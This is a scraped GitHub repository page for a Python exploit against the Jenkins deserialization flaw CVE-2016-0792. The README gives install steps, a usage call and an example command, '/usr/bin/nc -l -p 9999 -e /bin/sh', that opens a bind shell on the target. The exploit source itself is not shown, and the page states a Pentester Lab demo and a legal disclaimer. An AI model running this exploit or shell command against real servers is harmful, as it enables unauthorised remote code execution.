Jenkins CVE-2016-0792

Exploit for Jenkins serialization vulnerability - CVE-2016-0792

Exploit database

https://www.exploit-db.com/exploits/42394/

More information can be found here

Requirements

Python 3.6.x
requests library is required for this exploit to work

sudo pip install requests

Usage

python3

from exploit import exploit

exploit(url, command)

Where url is url to jenkins server and command is command to execute

Example

exploit('http://192.168.56.101/jenkins/', '/usr/bin/nc -l -p 9999 -e /bin/sh')

This will run nc and listen on port 9999 on vulnerable machine

For demonstration purposes I will be running ISO from Pentester Lab

Disclaimer

Using this software to attack targets without permission is illegal. I am not responsible for any damage caused by using this software against the law.

Name		Name	Last commit message	Last commit date
Latest commit History 7 Commits
.gitignore		.gitignore
LICENSE		LICENSE
README.md		README.md
exploit.py		exploit.py
prepare_payload.py		prepare_payload.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

.gitignore

.gitignore

LICENSE

LICENSE

README.md

README.md

exploit.py

exploit.py

prepare_payload.py

prepare_payload.py

Repository files navigation

Jenkins CVE-2016-0792

Exploit for Jenkins serialization vulnerability - CVE-2016-0792

Exploit database

More information can be found here

Requirements

Usage

Example

Disclaimer

About

Releases

Packages

Languages

Navigation Menu

License

jpiechowka/jenkins-cve-2016-0792

Folders and files

Latest commit

History

Repository files navigation

Jenkins CVE-2016-0792

Exploit for Jenkins serialization vulnerability - CVE-2016-0792

Exploit database

More information can be found here

Requirements

Usage

Example

Disclaimer

About

Topics

Resources

License

Stars

Watchers

Forks

Languages